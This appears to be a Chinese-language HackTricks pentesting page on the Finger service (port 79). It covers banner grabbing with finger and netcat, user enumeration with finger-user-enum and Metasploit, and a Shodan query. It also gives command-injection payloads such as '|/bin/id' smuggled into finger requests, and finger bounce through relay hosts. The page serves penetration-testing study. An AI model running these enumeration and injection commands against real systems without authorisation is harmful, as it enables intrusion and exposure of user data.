5.5 KiB
79 - Pentesting Finger
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
你在一个网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想获得PEASS的最新版本或下载PDF格式的HackTricks吗?请查看订阅计划!
-
发现我们的独家NFTs收藏品- The PEASS Family
-
加入 💬 Discord群组 或者 telegram群组 或者 关注我在Twitter上的🐦@carlospolopm.
-
通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。
基本信息
Finger是一个可以用来查找计算机用户信息的程序。它通常列出登录名、全名和可能的其他有关用户的详细信息。这些详细信息可能包括办公地点和电话号码(如果已知)、登录时间、空闲时间、上次阅读邮件的时间以及用户的计划和项目文件。
**默认端口:**79
PORT STATE SERVICE
79/tcp open finger
枚举
获取横幅/基本连接
在渗透测试中,枚举是一项重要的任务,它允许我们收集关于目标系统的信息。横幅抓取是一种常用的枚举技术,它通过与目标系统建立基本连接并读取返回的横幅信息来获取有关系统的详细信息。这些横幅信息通常包含有关操作系统、应用程序版本和其他有用的信息。通过分析这些信息,我们可以识别系统的弱点和潜在的攻击面。
要执行横幅抓取,我们可以使用finger
命令。该命令允许我们查询远程系统上的用户信息。以下是使用finger
命令进行横幅抓取的示例:
finger @<target_ip>
在执行此命令时,请将<target_ip>
替换为目标系统的IP地址。执行命令后,我们将收到目标系统返回的横幅信息。
横幅抓取是一种简单而有效的枚举技术,但并不总是可用。有些系统可能已禁用finger
服务或限制了对其的访问。在这种情况下,我们可以尝试使用其他枚举技术,如端口扫描和服务识别,以获取目标系统的信息。
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
用户枚举
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
或者你可以使用来自pentestmonkey的finger-user-enum,以下是一些示例:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmap执行一个脚本来使用默认脚本
Metasploit使用的技巧比Nmap更多
use auxiliary/scanner/finger/finger_users
Shodan
port:79 USER
命令执行
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Finger反弹
finger user@host@victim
finger @internal@external
☁️ HackTricks 云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
你在一家网络安全公司工作吗?想要在 HackTricks 中宣传你的公司吗?或者你想要获取最新版本的 PEASS 或下载 HackTricks 的 PDF吗?请查看订阅计划!
-
发现我们的独家NFTs收藏品——The PEASS Family
-
加入 💬 Discord 群组 或 Telegram 群组,或者关注我在推特上的🐦@carlospolopm。
-
通过向 hacktricks 仓库 和 hacktricks-cloud 仓库 提交 PR 来分享你的黑客技巧。